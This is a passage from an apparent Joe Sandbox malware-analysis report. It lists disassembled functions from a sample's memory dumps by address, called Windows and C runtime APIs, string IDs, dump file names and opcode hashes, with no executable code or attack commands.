                                                                                                                                                                                                                                                                                                                              • Instruction ID: d34526af6eb8cffcc7d04472f151a01b8e2d44339627a14a79103713b5e93f66
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18d595ba6be5cc70757725346e7d2d62300b8bd13259b4a49d2a6c5daaad41ed
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35C04C1C00038A617C24FB742112D9D0341DF924C5BD594D3BC452784F9D66750F127B
                                                                                                                                                                                                                                                                                                                              Function 00420F7E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _memcmp
                                                                                                                                                                                                                                                                                                                              • String ID: 4[G$4[G
                                                                                                                                                                                                                                                                                                                              • API String ID: 2931989736-4028565467
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 499d9a999da2a443c979618ec85ef4d06b5b2aab7498d5870cc08a11d2f7c627
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 33b36a833443cc607bae0a2c4f054eab59dd7b99d1d8389eb50a0704093c1055
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499d9a999da2a443c979618ec85ef4d06b5b2aab7498d5870cc08a11d2f7c627
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E56110716047069AC714DF28D8406B3B7A8FF98304F44063EEC5D8F656E778AA25CBAD
                                                                                                                                                                                                                                                                                                                              Function 028363F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0283655C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028362BC: IsProcessorFeaturePresent.KERNEL32(00000017,028362AB,00000000,?,?,?,?,00000016,?,?,028362B8,00000000,00000000,00000000,00000000,00000000), ref: 028362BE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028362BC: GetCurrentProcess.KERNEL32(C0000417), ref: 028362E0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028362BC: TerminateProcess.KERNEL32(00000000), ref: 028362E7
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                                                                                              • String ID: *?$.
                                                                                                                                                                                                                                                                                                                              • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9776f111c1b25b327d953986c1ef3631276924e70d661b0189db24acf40b0578
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B751947EE00219AFDF15DFACC8806ADB7F9EF48324F248169D554E7304E7759A018B94
                                                                                                                                                                                                                                                                                                                              Function 10018940 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10018AAC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000DAC8: IsProcessorFeaturePresent.KERNEL32(00000017,1000DA9A,1000A5B7,?,?,?,1000A5B7,00000016,?,?,1000DAA7,00000000,00000000,00000000,00000000,00000000), ref: 1000DACA
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000DAC8: GetCurrentProcess.KERNEL32(C0000417,?,1000A5B7), ref: 1000DAEC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000DAC8: TerminateProcess.KERNEL32(00000000,?,1000A5B7), ref: 1000DAF3
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                                                                                              • String ID: *?$.
                                                                                                                                                                                                                                                                                                                              • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                                                                                              • Opcode ID: fc9f9b4b8ba31cf966cd2057bb17eb1da70377e1df1eefddb6208867ea106fcf
                                                                                                                                                                                                                                                                                                                              • Instruction ID: cadee44e4b68b609616d9b5a2801787b954e88145d2cb79ec865a40ecf5c13b6
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc9f9b4b8ba31cf966cd2057bb17eb1da70377e1df1eefddb6208867ea106fcf
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72519275E0021ADFDB14CFA8C881AADBBF5EF48350F25816AE854EB301E635EF418B51
                                                                                                                                                                                                                                                                                                                              Function 10005360 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-2556327735
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 324017de673d391672642848050ca3e9dc3f983fc79ac6a1018a86b459fc4194
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4af35c2643fa0229985ac1aea7182f36bb2eeb850aac5675f62255cc1c7371e4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 324017de673d391672642848050ca3e9dc3f983fc79ac6a1018a86b459fc4194
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD41D3317043058BAB24CE58E8848AFB3E9FF916D7321492EF542C7618DB32E9448BA1
                                                                                                                                                                                                                                                                                                                              Function 100054C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 100055E1
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 100055EB
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0027862d4d7062a5b88e9d5f0e5cbe2b61fa6d23551b62125d086d9ced322fa1
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2f3713a405c0175dfbb4312078a92c0e6100ffda4a0d56c92506938931a9961d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0027862d4d7062a5b88e9d5f0e5cbe2b61fa6d23551b62125d086d9ced322fa1
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7931C835704B408FF724CE5CACA0A1BB3E7EB406D7B610A2DF592CB695D762ED4087A1
                                                                                                                                                                                                                                                                                                                              Function 10003570 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-2556327735
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 25fba71cc95f781cd9963768d063412e9d4f9aac76987ea5514fa5efdf1f4ec8
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 15c224a21538f9790836f5c726a40e0df5128f8623dfe489635fbbf3d33d23f8
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25fba71cc95f781cd9963768d063412e9d4f9aac76987ea5514fa5efdf1f4ec8
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C31C6323047119BF726CE5CAC8096BF3EDEB956D1760CA2EE58187759CB32DC4087A1
                                                                                                                                                                                                                                                                                                                              Function 10004330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-2556327735
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 51bc33959f9528ff4dc7c845178c5e65d9268d66ab4979a07835f8249f6ae300
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1ea6db056af32ae78525d840582dd1771f02cb9085f46fc2c6811f606c33abc7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51bc33959f9528ff4dc7c845178c5e65d9268d66ab4979a07835f8249f6ae300
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F31D5B27057108BA734DE5CE88085EF3E9FF81691322562EF186C7618DF31AA4487A5
                                                                                                                                                                                                                                                                                                                              Function 10003EC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10003FDB
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b9ae4267b34400fa55d51dc4f8be9ceed40e1449c4501b0f5fd7de9ec1f04af8
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 67010eaabe5ec19f8eb2dbbdff826c503681b6fb1e0afb3ed4744b86d6ac49c7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9ae4267b34400fa55d51dc4f8be9ceed40e1449c4501b0f5fd7de9ec1f04af8
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F631D2367043128BE721CE5CE840B67F7F9EB916A1F214A3FF5468B649D772A84087A1
                                                                                                                                                                                                                                                                                                                              Function 1000AE1D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A,?), ref: 1000AE36
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                                                                              • String ID: $MZ@
                                                                                                                                                                                                                                                                                                                              • API String ID: 2325560087-1719208621
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 391da35a3863b86254b03c17b4306fa7bf071c5b162a5709827f420cadfd38cb
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c10e40035c381da4b7154146db833fe46c232d81a9f0e8cf3361085bbbd73af4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 391da35a3863b86254b03c17b4306fa7bf071c5b162a5709827f420cadfd38cb
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5516AB1D10A568BEB44CFA5C8C16AEBBF4FB48394F20C16AD409EB254D334A981CF60
                                                                                                                                                                                                                                                                                                                              Function 0044DB44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Info
                                                                                                                                                                                                                                                                                                                              • String ID: $vD
                                                                                                                                                                                                                                                                                                                              • API String ID: 1807457897-3636070802
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65
                                                                                                                                                                                                                                                                                                                              Function 10003A70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10003B85
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 753ed6a34f3666a5248bbcea129088d50049987ac77d3d9b3624efbd587c36aa
                                                                                                                                                                                                                                                                                                                              • Instruction ID: edc99c1af25dbac56c4533e702380cee898722e9e6e8df2b93293301c0b2d031
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 753ed6a34f3666a5248bbcea129088d50049987ac77d3d9b3624efbd587c36aa
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F631CF32304710CB9721DF6CE88085BF3E9FF85695311862FE686C7219EB31A95487A2
                                                                                                                                                                                                                                                                                                                              Function 100080A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1000818D
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10008197
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-3788999226
                                                                                                                                                                                                                                                                                                                              • Opcode ID: cb9423fad82669d08df49fd2dc675643d09d7b70617caed834aba26ae0979558
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1ccc3903a69bb7a6bcf247a0b5372026bbc2c80ecff82e53e65115d2b39116d6
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb9423fad82669d08df49fd2dc675643d09d7b70617caed834aba26ae0979558
